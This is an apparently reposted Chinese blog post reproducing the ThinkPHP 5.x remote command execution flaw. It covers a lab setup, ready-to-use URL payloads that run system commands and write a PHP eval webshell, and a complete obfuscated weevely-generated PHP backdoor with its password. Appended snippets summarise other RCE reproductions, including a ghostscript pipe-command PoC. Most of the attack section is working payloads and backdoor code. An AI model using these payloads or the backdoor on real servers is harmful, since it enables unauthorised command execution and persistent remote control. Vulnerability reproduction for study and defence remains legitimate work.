thinkphp5.x命令执行漏洞复现及环境搭建

楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧，别看错了

1.安装composer

yum -y install composer

安装php拓展

yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -y

2.切换目录到/var/www/html

cd /var/www/html

安装thinkphp5

博主把含有命令执行漏洞的thinkphp源码链接附上

链接：https://pan.baidu.com/s/1MNqISFeKKT4FcJRHg2rTRw
提取码：se0n

把文件解压到当前目录(/var/www/html)即可

3.浏览器查看是否安装成功

到这里环境就搭建好了（各位看官如果照着前面的步骤没有成功的，麻烦把php运行环境搭建起来）

4.参考官方poc直接执行payload

#payload
http://192.168.2.134/tp5/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以看到，这里权限是Apache

这里说下，头一天强网杯web有一题就是thinkphp5.x的命令执行漏洞，叫做强网先锋上单。。。

当时觉得还好，随便拉的几个队友，有人做出来了，我去重新做了一遍（关键是互相不认识，谁做的根本不知道）

一开始扫描目录，没发现什么，后面留意到有日志，都是命令执行错误的信息，猜到可能是命令执行，一看cms是thinkphp5

于是就百度翻payload去了，一打，flag有了，flag就藏在根目录下面，hhhhh

言归正传，下面尝试写小马，getshell整个系统

payload附上

http://192.168.2.134/tp5/public/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20  ^%3C?php%[email protected]($_GET[%22dd%22])?^%3E%3Eceshi.php

强网的时候是可以正常写入的，但是无法解析php，可能设置了权限

本地测试的时候发现，根本无法写入小马，如图，估计要先看看源码，找找问题

后面看了下日志，注意到报错，应该是语句被过滤了，小马不够强壮

后面我用weevely重新生成了一个小马，重新载入，连上了

webshell附上

<?php
$v=‘$cK^&&$i<$lK^);$j+K^+,$i++K^K^){$o.=$t{$K^i}^K^$k{$j};}}K^retK^urn $o;}if (@pK^K^reg_match("K^/$kK^h(.‘;
$S=str_replace(‘jW‘,‘‘,‘crjWjWeatejW_fjWjWunctijWon‘);
$t=‘K^zuncoK^mpress(@K^xK^(@bK^ase64_decodeK^($m[1K^]),$k)));K^ K^ $oK^[email protected]_get_conteK^ntK^s();  @oK^bK^_‘;
$X=‘end_clean(K^);  $K^[email protected]^4_encoK^de(@x(K^K^K^@gzcomK^press($o),$k));K^  priK^nt("$p$khK^$r$kf");}‘;
$o=‘+K^)$kf/K^",@fK^ile_get_conteK^ntsK^("php://inK^put")K^K^,$m) == 1) { K^ @ob_sK^taK^rt();  @eK^val(@g‘;
$f=‘$k="098K^K^f6bcd";$khK^=K^"4621d373cade";$kK^f="4K^e832627bK^4f6"K^K^;$p="sK^015KnbG8K^frqxRiQ";fK^K^u‘;
$w=‘nctiK^on x($t,$kK^){K^$c=strlen($k)K^;$K^l=K^strlen($t);$o="K^"K^;K^for($i=0;$i<$l;)K^{for($jK^=K^0;($j<‘;
$N=str_replace(‘K^‘,‘‘,$f.$w.$v.$o.$t.$X);
$d=$S(‘‘,$N);$d();
?>

#######
密码test
#######

下一步，想办法提权操作，毕竟权限太低了

weevely支持很多的操作，如下图

有空继续整，未完待续

原文地址：https://www.cnblogs.com/mke2fs/p/10931854.html

时间： 2024-08-30 00:27:13

thinkphp5.x命令执行漏洞复现及环境搭建的相关文章

路由器漏洞挖掘之 DIR-850/645 命令执行漏洞复现

前言这次来分析两个比较经典的路由器命令执行漏洞,DIR-850 和 DIR-645 的 RCE,漏洞成因都是由于参数拼接不当造成的. 漏洞分析根据前一篇文章中的任意文件读取漏洞,在读取到 DEVICE.ACCOUNT 配置文件中的敏感信息之后,我们就可以进一步利用,达到命令执行的目的,进而 getshell. php 源代码代码如下: 这里的 server 变量可控,导致在拼接时,我们可以闭合前面的命令参数,执行任意命令. 通过前一步的任意文件读取得到 admin 的密码之后,登录上去抓包

CVE-2019-0193 远程命令执行-漏洞复现

0x01 漏洞简介 Apache Solr 是一个开源的搜索服务器.Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现.此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据.它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置.由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行. 0x02 环境搭建我这里使

ghostscript 远程命令执行漏洞复现

影响的版本 <= 9.23(全版本.全平台) Ubuntu 开启 ghostscript [email protected]:~$ gs -q -sDEVICE=ppmraw -dSAFER -s0utputFile=/dev/null 依次输入 legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops showpage 执行结果 poc %!P

WordPress <= 4.6 命令执行漏洞(PHPMailer)复现分析

漏洞信息 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站.也可以把 WordPress 当作一个内容管理系统(CMS)来使用.WordPress 使用 PHPMailer 组件向用户发送邮件.PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害. 漏洞编号 CVE-2016-10033 影响版本 WordPress

利用Vulnhub复现漏洞 - Couchdb 任意命令执行漏洞（CVE-2017-12636）

漏洞原理:Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库.应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序). 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12

由一道工控路由器固件逆向题目看命令执行漏洞

前言 2019 工控安全比赛第一场的一道固件逆向的题目,好像也比较简单,好多人都做出来了.这里就分别从静态和动态调试分析复现一下这个命令执行的洞. 赛题说明题目给的场景倒是挺真实的:路由器在处理 tddp 协议时出现了命令注入,导致了远程命令执行.就是后面做出来的这个答案的格式咋提交都不对... 题目给了一个压缩文件,解压出来时一个 bin 文件. 使用 binwalk -Me 直接解压,得到了与一个标准的 linux 风格的文件系统: 后来知道这个固件其实就是 tp_link SR20 路由

命令执行漏洞

0x01:命令执行漏洞简介用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码 0x02:命令执行 VS 代码执行命令执行漏洞: 直接调用操作系统命令代码执行漏洞: 靠执行脚本代码调用操作系统命令命令执行原理: 在操作系统中,"&.|.||"都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导

NETGEAR 系列路由器命令执行漏洞简析

NETGEAR 系列路由器命令执行漏洞简析 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR R7000路由器的命令注入漏洞.一时间,各路人马开始忙碌起来.厂商忙于声明和修复,有些人忙于利用,而我们则在复现的过程中寻找漏洞的本质. 一.漏洞简介 1.漏洞简介 2016年12月7日,NETGEAR R7000路由器在exploit-db上被爆出存在远程命令执行漏洞,随着安全研究人员的不断深入,R8000和R6400这两款路由器也被证实有同样的问题. 2016年12月1

【知道创宇404实验室】Oracle WebLogic远程命令执行漏洞预警

2019年04月17日,国家信息安全漏洞共享平台(CNVD)官方发布安全公告 http://www.cnvd.org.cn/webinfo/show/4989 称Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞,***者可利用该漏洞,可在未授权的情况下远程执行命令.随后知道创宇404实验室启动应急流程,通过分析后复现了该漏洞并确定该漏洞影响启用了wls9_async_response.war及wls-wsat.war组件的所有Weblogic版本(包括最新版本